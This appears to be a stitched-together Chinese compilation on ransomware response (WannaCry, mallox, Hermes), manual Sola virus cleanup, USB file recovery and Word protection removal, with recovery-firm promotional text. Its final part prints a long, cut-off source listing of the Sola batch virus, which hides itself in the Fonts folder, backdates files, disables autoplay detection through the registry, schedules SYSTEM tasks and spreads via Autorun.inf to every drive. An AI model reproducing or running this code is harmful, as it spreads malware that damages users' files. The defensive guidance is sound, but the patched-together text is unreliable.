SOLA病毒批处理

勒索病毒WannaCry解决办法
1、为计算机安装最新的安全补丁，微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞，请尽快安装此安全补丁，对于Windows XP、2003等微软已不再提供安全更新的机器，可以借助其它安全软件更新漏洞。

2、关闭445、135、137、138、139端口，关闭网络共享。

3、强化网络安全意识：不明链接不要点击，不明文件不要下载，不明邮件不要打开。

4、尽快（今后定期）备份自己电脑中的重要文件资料到移动硬盘、U盘，备份完后脱机保存该磁盘。

5、建议仍在使用Windows XP，Windows 2003操作系统的用户尽快升级到Window
7/Windows 10，或Windows 2008/2012/2016操作系统。

按下键盘的Windows键，打开控制面板
点击Windows防火墙
点击左边高级设置
点击左上角的入站规则
点击右边的新建规则
点击第二个选项→端口，点击下一步
选择TCP
在下方特定本地端口中输入135，445，点击下一步
选择第三个选项→阻止连接，点下一步，再点下一步
输入名称：比特币病毒防护，点击完成
重复一次3-10，在第7步时选择UDP
做完上面所有步骤后你会在入站规则的最上方看到两个新建的规则，这就表示完成了，保险起见，重启一下电脑。

勒索病毒处置总结1. 简介勒索病毒是指一种恶意软件，通过加密或锁定受害者的文件，并要求支付赎金才能解密或解锁文件。

近年来，勒索病毒攻击事件不断增加，并给个人用户、企业和政府机构带来严重危害。

本文档将总结勒索病毒的常见类型、处置策略和预防措施，帮助用户更好地应对和应对勒索病毒攻击。

2. 勒索病毒的常见类型2.1 加密型勒索病毒加密型勒索病毒通过使用强大的加密算法对受害者的文件进行加密，使其无法打开或读取。

攻击者通常要求受害者支付赎金以获取解密密钥，从而恢复文件的可访问性。

2.2 锁定型勒索病毒锁定型勒索病毒会锁定受害者的计算机或移动设备，并阻止其访问操作系统或特定应用程序。

为了解锁设备，受害者需支付赎金以获取解锁密码或工具。

3. 勒索病毒的处置策略3.1 与安全团队合作一旦发现系统受到勒索病毒攻击，应立即与安全团队或专业安全公司合作。

安全团队将帮助受害者分析病毒样本，并提供属于该病毒家族的解密工具或解锁密钥，以恢复文件的可用性。

3.2 断开网络连接为防止勒索病毒进一步传播和感染其他系统，建议立即断开受感染计算机与局域网或互联网的连接。

这将降低病毒在网络中的传播速度，同时阻止攻击者与受感染计算机进行通信。

3.3 禁止支付赎金虽然支付赎金可能看起来是解决问题的简单方法，但并不推荐这样做。

首先，付款并不能保证攻击者会提供有效的解密或解锁工具。

其次，付款只会刺激更多的犯罪行为。

最重要的是，政府机构和执法机构是反对赎金支付的，因为这可能会支持罪犯活动。

3.4 备份和恢复及时备份文件是预防和应对勒索病毒的最佳策略之一。

如果受到攻击，您可以随时恢复备份文件，并尽可能减少数据丢失和业务中断。

3.5 安全软件保护定期更新和使用可靠的安全软件（如杀毒软件、防火墙等）可以帮助您保护系统免受勒索病毒和其他恶意软件的攻击。

更重要的是，保持软件及时更新以获取最新的病毒定义和安全补丁。

4. 勒索病毒攻击的预防措施4.1 教育培训用户和组织应定期进行有关勒索病毒的安全意识培训。

浅析Sola病毒结构摘要： sola病毒是一种以批处理文件为主要运行体的病毒。

其技术含量并不算高，但对用户数据文件所造成的影响较大。

其主要特征是感染doc、txt、exe和jpg四类文件，将其变为exe文件。

本文针对sola病毒的特征、结构做了简单分析，并归纳了sola病毒的处理方法。

abstract： sola virus is a kind of batch virus which mainly runs by bat files. it hasn’t high technical content， but makes great impact on the user data files. its main feature is infecting with four types of files in doc， txt， exe and jpg， turns them into exe files. author made a simple analysis of the characteristics and structure of the virus in sola，and summarized the approach of sola virus.关键词： sola；病毒；结构key words： sola；virus；structure中图分类号：tp30 文献标识码：a 文章编号：1006-4311（2012）30-0215-020 引言sola病毒又名“死亡问答”宅男病毒，是一款由批处理文件运行的病毒，技术含量不很高，威力也不算强大，但对用户文件造成的影响较大，至今仍然可以见到被sola病毒感染入侵的案例。

由于是批处理病毒，源代码容易获取，所采用的隐藏手段也容易被破解，所以对于那些对病毒原理感兴趣，同时又没有专业工具的人来说是有一定研究价值的素材。

1 sola病毒特征sola病毒有变种，本文针对较有代表性的版本做简单分析。

应急响应之勒索病毒4.1 勒索病毒简介勒索病毒通常利⽤⾮对称加密算法和对称加密算法组合的形式来加密⽂件4.1.1 常见勒索病毒·STOP勒索病毒·GandCrab勒索病毒·REvil/Sodinokibi勒索病毒·Globelmposter勒索病毒·CrySiS/Dharma勒索病毒·Phobos勒索病毒·Ryuk勒索病毒·Maze(迷宫)勒索病毒·Buran勒索病毒4.1.2 勒索病毒传播⽅法·服务器⼊侵传播：通过系统或者软件漏洞进⼊服务器，或RDP破解远控；利⽤病毒，⽊马来盗取密码进⾏⼊侵；·利⽤漏洞⾃动传播：利⽤系统⾃⾝漏洞进⾏传播·软件供应链攻击传播：对合法软件进⾏劫持篡改，绕过了安全产品·邮件附件传播：在附件中夹带恶意⽂件，执⾏其中的脚本·挂马⽹页传播：在⽹页插⼊⽊马，受害的为裸奔⽤户4.1.3 勒索病毒的攻击特点⽆C2服务器加密技术：·在加密前先随机⽣成新的加密密钥对（⾮对称公，私钥）·使⽤新⽣成的公钥对⽂件进⾏加密·采⽤攻击者预埋的公钥把新⽣成的私钥进⾏加密，保存于⼀个ID⽂件中或嵌⼊加密⽂件⽆C2服务器解密技术：·通过邮件和在线提交的⽅法，提交ID串或加密⽂件中的加密私钥（⼀般攻击者会提取该私钥）·攻击者使⽤保留的与预埋公钥对应的私钥解密受害者提交过来的私钥·把解密私钥或解密⼯具交付给受害者进⾏解密勒索病毒平台化运营更加成熟勒索病毒攻击的定向化，⾼级化漏洞利⽤频率更⾼，攻击平台更多攻击⽬的多样化4.1.7 勒索病毒的防御⽅法⽂档⾃动备份隔离（定时任务脚本⾃动备份）综合性反勒索病毒技术（蜜罐）云端免疫技术（云端下发免疫）密码保护技术（采⽤弱密码及双因⼦认证）4.2 常规处置⽅法在勒索病毒的处置上，通常要应急响应⼯程师采取⼿动处置与专业查杀⼯具相结合的⽅法4.2.1 隔离被感染的主机/服务器在确认服务器/主机感染病毒后，应⽴即隔离被感染的服务器/主机，主要采取物理隔离，访问控制权限。

勒索病毒处置方案现代社会以网络为主要工具，如何保障网络安全成为一项重要的任务。

勒索病毒作为当前网络安全领域内比较常见的病毒，给企业和个人带来了很大的损失。

因此，制定一套有效的勒索病毒处置方案，成为保障网络安全和保护个人隐私的一项必要措施。

勒索病毒特点勒索病毒通常采用一些常见的手段，比如通过电子邮件、非正规软件等途径感染电脑。

其病毒分布一般是通过一些工具扫描漏洞将恶意代码传达到目标电脑。

常用的勒索病毒有Locky、WannaCry、Petya等。

勒索病毒最主要的特点在于它可以封锁受害者电脑、网络或者文件，从而勒索受害者支付赎金才能恢复。

此外，病毒也会偷窥用户私人信息，窃取盈利渠道等。

处置方案勒索病毒的处置方案主要包括以下几步：第一步：备份重要数据据不完全统计，超过90%的勒索病毒都是利用电脑的弱点进行攻击，随后加密电脑中的个人文件，并对受害者进行勒索，索要赎金。

因此，备份数据是非常关键的一步。

请务必将重要文件备份到外部硬盘、云存储等安全环境之中。

第二步：隔离电脑如果你的电脑已经感染了勒索病毒，第一时间隔离电脑，将电脑与其他计算机、网络和外部存储设备分离。

避免病毒的尾随传播和蔓延。

第三步：使用杀毒软件进行扫描勒索病毒的感染与普通病毒的感染方式相似，也需要利用一些扫描工具对电脑进行全面检测。

使用可靠的杀毒软件进行扫描，找出感染点，消灭病毒。

第四步：在未支付赎金之前不要轻易尝试解密在购买恢复文件前请务必进行咨询、确认后谨慎操作，因为勒索病毒是利用恐怖和威慑来获得你的赎金。

无论如何，如果你已经备份了重要文件，就不需要贸然支付目前日益出现的高额赎金。

第五步：修改密码和查杀木马在清除病毒后，请及时修改所有相关密码。

另外，请利用电脑的杀毒软件，扫描并清除任何木马病毒。

预防勒索病毒的措施除了以上的处置方案外，预防勒索病毒也非常重要。

主要有以下几点：1.尽量不要下载珍藏版、破解版等不安全的软件，而更应该使用权威可靠的软件下载渠道。

勒索病毒分析报告引言本文对一种名为勒索病毒的恶意软件进行了深入分析和研究。

勒索病毒是一种威胁严重的恶意软件，它会加密用户文件，并要求支付赎金以解密这些文件。

本文将详细介绍勒索病毒的传播途径、感染方式、加密算法等相关内容，并提供一些对抗勒索病毒的建议。

分析方法分析勒索病毒的过程中，我们采用了以下方法：1.样本收集：收集了多个勒索病毒样本，并在安全环境下进行分析，以避免对真实环境造成影响。

2.动态行为分析：使用虚拟机和沙箱环境，观察勒索病毒的行为，包括文件的加密、系统的修改等。

3.静态特征分析：对勒索病毒的二进制文件进行静态分析，提取出文件结构、加密算法等特征信息。

4.网络流量分析：捕获勒索病毒感染过程中的网络流量，分析其通信行为和C&C服务器地址。

勒索病毒的传播途径勒索病毒主要通过以下途径进行传播：1.恶意电子邮件附件：勒索病毒制作者会将病毒程序隐藏在看似正常的电子邮件附件中，一旦用户打开附件，病毒即开始感染用户的计算机。

2.恶意网站链接：黑客通过在恶意网站上放置下载病毒的链接，诱使用户点击下载并感染计算机。

3.外部存储设备：感染了勒索病毒的计算机连接到外部存储设备（如U盘）后，病毒会自动复制到设备中，从而传播到其他计算机。

勒索病毒的感染方式一旦用户的计算机被感染，勒索病毒会通过以下方式进行感染活动：1.文件加密：勒索病毒会扫描用户计算机上的文件，并使用强大的加密算法对这些文件进行加密，使其无法被用户打开和使用。

2.弹窗提示：感染后，勒索病毒会弹出一个提示窗口，要求用户支付赎金以获取解密密钥。

通常勒索病毒会采用比特币等虚拟货币进行支付，以保证匿名性。

3.修改系统设置：为了保证用户无法轻易恢复被加密的文件，勒索病毒会修改用户计算机的系统设置，禁用一些常用的恢复功能。

勒索病毒的加密算法勒索病毒通常使用高强度的加密算法对用户文件进行加密，以保证解密难度极大。

常见的加密算法包括：1.RSA加密算法：勒索病毒使用RSA算法生成一对公钥和私钥，公钥用于文件加密，私钥用于解密。

sola 病毒使文件变成exe后的手工杀毒及修复方法电脑病毒看不见，却无处不在，有时防护措施不够或者不当操作都会导致病毒入侵。

有用户电脑被一个名为sola的病毒感染，造成很多word文档(doc)、图片(jpg)都变成了exe文件，而且无法打开。

方法步骤用瑞星查毒无法差到，用卡巴升级到5月25号以后的才能查到，但是注意卡巴会把感染的word文档、图片一起删除!因为很多文件都是加急和重要的，如果丢失了就问题就严重了，所以不懂电脑千万别用卡巴斯基，因为他太专业了。

幸好这个毒源文件不多，几下我就删干净了，具体清除方法网上有，但我的方法可能更简单点：(如果你不懂怎样进安全模式怎样查看隐藏文件怎样解压缩就不用往下看了)1、进安全模式。

一定要进安全模式，不然像icesword这些软件他能模拟，打开后无法看见他的病毒进程sleep.exe。

这一度欺骗了我，利害!2、删每个分区下的名为sola隐藏文件夹3、搜索windows目录下关键字“sola"的所有文件和文件夹(注意打开搜索高级选项下的“搜索隐藏文件和系统文件”和“搜索子文件夹”)，删除所有有关sola这个名字的文件和文件夹，基本就是在windows/fonts这个目录下有个solasetup文件夹，一定要找到它，删除这个文件夹包括其内全部文件。

4、windows/fonts这个目录下有个sleep.exe文件，按创建时间排序，删除所有和他同一时间创建的文件。

5、个别机器在system32下还有个sleep.exe文件，删除。

这样就清干净了。

但是我想说的重头戏才开始，怎样恢复被破坏的word文档和图片呢?!网上我没找到教程，希望对大家有用：如果直接把后缀该回doc或jpg是无法打开文件的，而是要把后缀(扩展名)改称rar，再双击用winrar打开，你会发现里面有三个文件，其中一个就是你原来的文件或图片，另外两个是病毒文件，选择你要恢复的原文件解压缩到硬盘就可以了，注意只选择解压缩原文件，另外两个病毒文件千万不要解压缩。

U盘文件不显示的三种解决方法U盘文件不能显示了，但是看属性的时候发现空间仍然被占用。

使尽浑身解数，U盘内容还是无法显示。

有没有什么办法让U盘里面的文件夹重新显示出来呢？笔者总结了三个方法：1.可以用WINRAR找回文件随意随意打开一个压缩文件，打开对话框后，不要去解压缩，而是单击向上的箭头，一直找到U盘目录，就能看到u盘中的所有文件。

选中u盘中的一个文件夹，把它重新压缩到硬盘的其他位置，这样这个文件夹就被拷贝出来了，其他的文件夹也是同样的操作。

2.批处理解决@echo off@echo +-------------------------------------------------------------+@echo 本程序消除文件夹被病毒置上的隐藏属性@echo 维修联盟论坛@echo 2008.1@echo +-------------------------------------------------------------+@echo.@ECHO 可能需要一段时间，请耐心等待@echo 耐心等待...attrib -s -h *. /S /Dattrib +s +h System~1attrib +s +h Recycledattrib +s +h +a ntldr@ECHO 完成！@echo on将上面的代码拷贝进TXT文档，然后改后缀名为.bat，双击运行即可。

3.如果是受病毒影响，则采取以下步骤：1）找一台没有感染病毒的计算机；2）将该台计算机设为隐藏文件（文件夹）可见，包括系统文件夹亦可见。

具体的在文件夹选项中设置。

3）将U盘接入该电脑，插入后不要乱动。

4）右击“我的电脑”，选择“资源管理器”，然后在左边的目录列表中选中优盘的符盘，这样就会显示下面的内容了。

5）但这个时候你仍然不能乱动，否则病毒将会感染好的计算机。

6）将看到的这些文件复制到计算机上；复制后不要双击运行。

7）将这些文件属性去掉隐藏。

计算机服务器中了mallox勒索病毒解密方案计划，勒索病毒解密措施计算机技术的不断应用与发展，为企业的生产运营提供了有利条件，但网络安全威胁无处不在。

近期，广西某生物制药企业的计算机服务器遭到了mallox勒索病毒攻击，导致企业的计算机所有重要数据被加密，严重影响企业的生产运营。

云天数据恢复中心在接到企业求助后，立刻开展了分析检测，分析其中的加密状况与加密逻辑，为企业制定了合理的解密方案计划，接下来就为大家分享一下mallox勒索病毒的解密措施与应对计划。

一，断开网络连接。

当企业计算机服务器被mallox勒索病毒攻击后，企业应该先断开网络连接，避免mallox勒索病毒的横向传播，然后切断与该计算机的所有连接设备，以防止产生新的加密。

二，结束加密程序。

mallox勒索病毒具有较强的攻击与加密能力，采用新升级的RSA与AES 加密算法，想要对中毒计算机进行任何操作前，应该先结束掉加密程序，同时按下Ctrl+alt+delete键进入到任务管理器，将所有程序结束掉，一般运行内存较大的为加密程序。

三，复制中毒文件。

如果中毒计算机中有需要恢复的文件，建议将其复制一份到移动硬盘或U盘上，以防止在恢复过程中意外的产生，防止对源文件的损坏。

四，解密恢复数据。

如果需要对计算机中加密文件进行解密，在复制完加密数据后，不要对计算机进行任何操作，防止对二次恢复带来困难，产生不必要的损失，也不要尝试修改后缀名或利用网络上的解密工具，一般很难自行破解。

勒索病毒解密方式有以下两种：1，整机解密，整机解密是一种全盘恢复的解密方式，如果解密恢复的数据中有图档或视频格式的文件，一般都会采用整机解密，整机解密数据恢复完整度高，数据恢复安全高效，但费用也不低。

2，数据库破解。

大部分企业的重要数据都存储在数据库中，如果解密数据库就可以满足需求，建议大家采用数据库破解，专业的数据恢复团队对市面上的各种后缀勒索病毒有着丰富的解密经验，数据恢复完整度，价格经济实惠。

企业计算机服务器中了mallox勒索病毒怎么办，mallox勒索病毒处理流程由于网络技术的不断发展与应用，越来越多的企业开始依赖计算机技术来提高企业效率。

然而，网络安全威胁无处不在，严重影响着企业计算机服务器中的数据安全。

近期，云天数据恢复中心接到许多中大型企业的求助，企业的多台服务器遭到了mallox勒索病毒攻击，导致企业计算机系统瘫痪，无法正常工作。

经过云天数据恢复中心工程师对mallox勒索病毒的破解，为大家整理了以下有关mallox勒索病毒的处理步骤流程。

一，切断网络，当发现计算机服务器被mallox勒索病毒攻击后，应该先切断网络，并不是关机操作，断开网络连接，切断与中毒计算机之间的所有连接与共享设备，防止mallox勒索病毒在企业内网下的横向传播。

二，终止加密，在对中毒计算机进行任何操作前，我们应该先终止加密程序，可以进入到计算机任务管理器，将所有陌生的运行程序或运行内存较大的程序结束掉，以防止在其他操作过程中产生新的加密。

三，拷贝文件，如果中毒计算机中有需要解密恢复的数据，我们需要提前将中毒文件拷贝一份出来到移动硬盘或U盘中，防止数据恢复中意外的产生，减少对源文件的损坏。

四，切勿盲目，mallox勒索病毒具有较强的攻击与加密能力，不要尝试对计算机文件的后缀名称更改或利用网络中的解密工具尝试破解，这种操作大多没有任何作用，只会为二次恢复增加困难，增加恢复成本。

五，破解文件，破解中毒计算机有两种方式，一种是整机解密，整机解密可以对计算机中的所有文件解密，这种解密成本较高，数据恢复完整度较高，可以对计算机上的所有文件进行破解。

另一种是数据库破解，专业的数据恢复研发团队对勒索病毒解密数据库破解有着丰富的经验，根据不同的加密程度与系统漏洞，制定合理的解密方案计划。

六，系统恢复，只有在企业重要数据文件解密恢复完成后，我们才可以对计算机进行操作，我们需要对中毒计算机全盘扫杀格式化，将病毒彻底从系统内清除干净后，再重装系统，部署企业应用软件，导入恢复好的数据即可完成系统恢复操作。

“爱马仕”勒索病毒分析作者：杨浩来源：《计算机与网络》2018年第10期近期，360安全中心发现一款名为”爱马仕”的勒索病毒开始在国内传播，该勒索病毒此次的主要攻击目标是Windows服务器。

目前流行的服务器勒索病毒中，有超过九成是通过远程桌面进行传播的。

该勒索病毒更让人头痛的一点是，它除了不加密exe、dll、ini、lnk几种类型的文件外，其余的类型的文件它都会加密。

这里提醒大家，开启服务器远程桌面时需要谨慎处理，万不可在使用弱口令的机器上开启，不要有侥幸心理。

病毒分析首先，勒索病毒会检测中招者磁盘的剩余量，如果获取磁盘剩余量失败或者是磁盘的容量不足4G，勒索病毒就会停止工作。

若磁盘空间充足，则会通过动态获取的方法加载后续操作所需要的函數，以此来躲避杀毒软件的静态查杀。

该勒索病毒同时还会对系统版本是XP、Server2000、Server2003和Server2003 R2的中招机器进行额外的内存处理。

由于在以上这些系统中，生成的密钥对和密钥容器都会被存储在内存中。

所以勒索病毒会额外清空一下内存中的密钥容器内容和密钥对，避免在内存中找到密钥从而恢复被加密的文件。

文件加密部分该勒索病毒会在本地生成两个文件：1.PUBLIC：病毒在本地生成的RSA密钥对中的公钥部分2. UNIQUE_ID_DO_NOT_REMOVE：包含两部分。

（a）用病毒在本地生成的AES密钥加密在本地生成的RSA密钥对中的私钥的密文；（b）用在病毒中硬编码的RSA公钥加密本地生成的AES密钥的密文；病毒在本地进行的RSA密钥对生成动作以及将密钥对中的RSA公钥写入到PUBLIC文件中。

接下来是UNIQUE_ID_DO_NOT_REMOVE文件的生成。

其第一部分是用256位的AES 密钥去加密2 048位的RSA的私钥。

而第二部分是用病毒中硬编码的RSA的公钥去加密AES 密钥。

完成后，病毒会将刚刚生成的PUBLIC文件中的RSA公钥读取出来，在稍后进行的文件加密操作中，用于对加密密钥的再加密工作。

方法一：今天有一朋友从网上下载了一个Word文档，可是打开该Word文档发现无法修改、查找、编辑，更可恶的是都不能选中Word文档中的内容。

其实这是由于该Word文档被文档保护了的原因，解决方法请接着往下看。

1、右击该Word文档→打开方式→写字板，相关截图如下所示：2、点击写字板中的文件菜单→另存为→文件类型选择为RTF文档，然后取个文件名，保存即可（注意：保存的时候不要忘记把文件名名后面的．doc去掉），相关截图如下所示：3、然后再用Word软件打开该文件就可以进行正常的编辑操作了4、最后再将你编辑好的文档再另存为Word文档即可说明：其实在上面第一步中，如果文档用写字板打开后能够进行编辑的话，可以直接将里面的内容复制出来就可以了。

方法二：（简单有效）启动word文档，新建一个空白文档，执行“插入文件”命令，打开“插入文件”对话框，定位到需要解除保护的文档所在的文件夹，选中该文档，单击“插入”按钮，将加密保护的文档插入到新文档中，文档保护会被自动撤销。

方法三：打开文档后，将其另存为XML文件，然后用UltraEdit(或者EditPlus，下载华军里搜索一下就行了)这个编辑软件打开刚刚存储的XLM文件，查找<w:documentProtection……w:unprtectPassword="******"/>,这个“******"是可变的。

只需要找到这段文字,然后删掉<w……/>这一段，保存退出，即可解除文档的密码保护。

:)方法四：将受保护能查看不能修改的文档，另存为，再弹出的保存窗口中选择“保存类型”为“word97-2002"格式，保存后。

再关掉word，重新打开，刚刚保存的文件，选择“工具”中“解除文档保护”即可编辑、修改这个文件了。

以上的三种方法都能够实现我们能看不能编辑的文档的保护密码的解除，大家可以用自己最为方便和习惯的使用方法。

警惕！计算机服务器中了malox勒索病毒怎么办？勒索病毒解密数据恢复警惕！警惕！企业老板们请注意，假的malox勒索病毒出现了，不要被malox勒索病毒骗了，能减少更多的经济损失。

近期，云天数据恢复中心陆续接到很多企业的求助，企业的计算机服务器遭到了malox勒索病毒攻击，导致企业计算机上所有的文件被加密无法正常使用，严重影响了企业的正常生产运行，后来，经过云天数据恢复工程师的解密恢复发现，该病毒有很多漏洞，下面就为大家简单介绍一下该病毒。

一，Malox勒索病毒介绍（1）加密形式，malox勒索病毒不仅会加密企业服务器数据库中的文件，还会加密企业计算机上的所有文件数据，该病毒采用的加密形式较为简单，但是一般很难自行解密，malox 勒索病毒并非mallox勒索家族，它是模仿mallox勒索家族的加密形式，但其中有很多漏洞。

（2）经济损失，一般企业计算机服务器中了malox勒索病毒，黑客要求企业在规定时间内支付相应的赎金来解密数据，大多是2000美金，费用也不低，给企业带来了严重的经济损失。

（3）数据安全，malox勒索病毒不仅会破坏企业计算机程序，更改企业的注册表，还会加密企业服务器上的数据库，给企业带来了严重威胁，造成企业重要数据与个人隐私数据泄露的问题。

二，Malox勒索病毒解密（1）备份恢复，一般企业都有自己的备份文件，通过全盘扫杀格式化系统后，将病毒清除干净，然后再部署企业计算机应用软件，导入数据库备份文件即可完成恢复，这种是最经济划算的恢复方式。

（2）整机解密，一般企业计算机上会存有企业重要的数据，很多企业不仅要求解密数据库，还会要求解密计算机上的所有文件数据，这种只能采用整机解密的方式，整机解密一般费用较高，但是各种数据恢复完整度较高。

（3）漏洞恢复，malox勒索病毒加密较为简单，云天数据恢复中心已经掌握了malox勒索病毒与mallox勒索家族病毒的加密形式，有着丰富的解密恢复经验，针对不同的企业也，可以制定出更加完善的解密恢复计划，尤其是malox勒索病毒已经做到了100%数据库恢复，确保数据安全。

@echo offset sola=%systemroot%\Fonts\HIDESE~1set setup=%systemroot%\Fonts\HIDESE~1\solasetupFOR /F "tokens=1" %%i in ('date /t') do set Realdate=%%iFOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\explorer.exe') do if /I "%%j"=="explorer.exe" set Date=%%iif "%1"=="-Install" goto Installif "%1"=="-Run" goto Runif "%1"=="-Tenbatsu" goto Tenbatsuif "%1"=="-Kill" goto Killif "%1"=="-Killself" goto Killself:CheckSignif "%1"=="-USB" start /max ..if "%1"=="-USB" cd SOLAif exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open:FileCopyset selfname=%0:HIDESelfdate %Date%md %systemroot%\Fonts\HIDESELF...\date %RealDate%if not "%1"=="-USB" type %selfname%>%systemroot%\Fonts\HIDESE~1\sola.batif "%1"=="-USB" type sola.bat>%systemroot%\Fonts\HIDESE~1\sola.battype Function.dll>%systemroot%\Fonts\HIDESE~1\Function.exeecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\SOLA.VBSecho setws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\SOLA.VBS echo ws.run "cmd /c %sola%\SOLA.BAT-Install",0 >>%systemroot%\Fonts\HIDESE~1\SOLA.VBScscript %systemroot%\Fonts\HIDESE~1\SOLA.VBSecho>%systemroot%\Fonts\HIDESE~1\sola.signdel %systemroot%\Fonts\HIDESE~1\SOLA.VBSgoto Open:Install:PackerSetup%SystemDrive%cd %systemroot%\Fonts\HIDESE~1if exist Function.exe taskkill /f /im Function.exeif exist solasetup rd /s /q solasetupmd solasetupcd solasetupcopy ..\Function.exe Function.dll..\Function.exe -xcd..date %Date%type %setup%\rar.exe >%systemroot%\system32\rar.exedate %Realdate%copy %setup%\Function.dll %sola%\Function.dllattrib %sola%\Function.dll +s +h +rrar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dlldel Function.exe:Mainsetupset A0001=copyset A0002=attribset A0003=echoset A0005=Shell Hardware Detectiontasklist >%sola%\task.txtFOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%del %sola%\task.txt:Tasks%A0002% %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobdate %Date%type %setup%\Tasks.xxx>%systemroot%\Tasks\Tasks.jobschtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFaildate %RealDate%goto TaskSuc:TaskFail%homedrive%cd "%ALLUSERSPROFILE%"cd 「开始」菜单\程序\启动date %Date%%A0003% On Error Resume Next>SOLA.VBS%A0003% set ws=wscript.createobject("wscript.shell")>>SOLA.VBS%A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS%A0001% SOLA.VBS %sola%\SOLA.VBS%A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasksdate %RealDate%:TaskSuc%A0002% %systemroot%\Tasks\Tasks.job +s +h +rdate %Date%%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exedate %RealDate%:NoAutoPlaynet stop "%A0005%"%A0003% Windows Registry Editor Version5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg%A0003%[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%syste mroot%\Fonts\HIDESE~1\Regedit.reg%A0003% "Start"=dword:00000004>>%systemroot%\Fonts\HIDESE~1\Regedit.regregedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg::End of Installgoto End&if errorlevel 1 exit::End of Install:Runset runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动set taskroot=%systemroot%\Tasks:RunTimeChkif not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txtFOR /F "tokens=1 delims=!" %%i in (%sola%\RunTime.txt) do set RunTime=%%iif /i %RunTime% leq 0 goto Virusset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txt:Diskchkecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBSecho setws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf .VBSecho ws.run "%sola%\svchost.exe/c %setup%\RecentInf.bat",0 >>%systemroot%\Fonts\HIDESE~1\RecentInf.VBScscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBSdel %systemroot%\Fonts\HIDESE~1\RecentInf.VBSfor %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr/C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1 attrib -s -h-r %%i:\Autorun.inf&copy/y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h+r&md %%i:\SOLA&copy /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT&copy /y "%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r:Turnif "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C:if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D:if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E:if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F:if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G:if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H:if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I:if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J:if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K:if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L:if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M:if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N:if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O:if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P:if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R:if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S:if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T:if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U:if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V:if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W:if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X:if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:if "%C%"=="2" vol C:&if errorlevel 1 set C=1if "%D%"=="2" vol D:&if errorlevel 1 set D=1if "%E%"=="2" vol E:&if errorlevel 1 set E=1if "%F%"=="2" vol F:&if errorlevel 1 set F=1if "%G%"=="2" vol G:&if errorlevel 1 set G=1if "%H%"=="2" vol H:&if errorlevel 1 set H=1if "%I%"=="2" vol I:&if errorlevel 1 set I=1if "%J%"=="2" vol J:&if errorlevel 1 set J=1if "%K%"=="2" vol K:&if errorlevel 1 set K=1if "%L%"=="2" vol L:&if errorlevel 1 set L=1if "%M%"=="2" vol M:&if errorlevel 1 set M=1if "%N%"=="2" vol N:&if errorlevel 1 set N=1if "%O%"=="2" vol O:&if errorlevel 1 set O=1if "%P%"=="2" vol P:&if errorlevel 1 set P=1if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1if "%R%"=="2" vol R:&if errorlevel 1 set R=1if "%S%"=="2" vol S:&if errorlevel 1 set 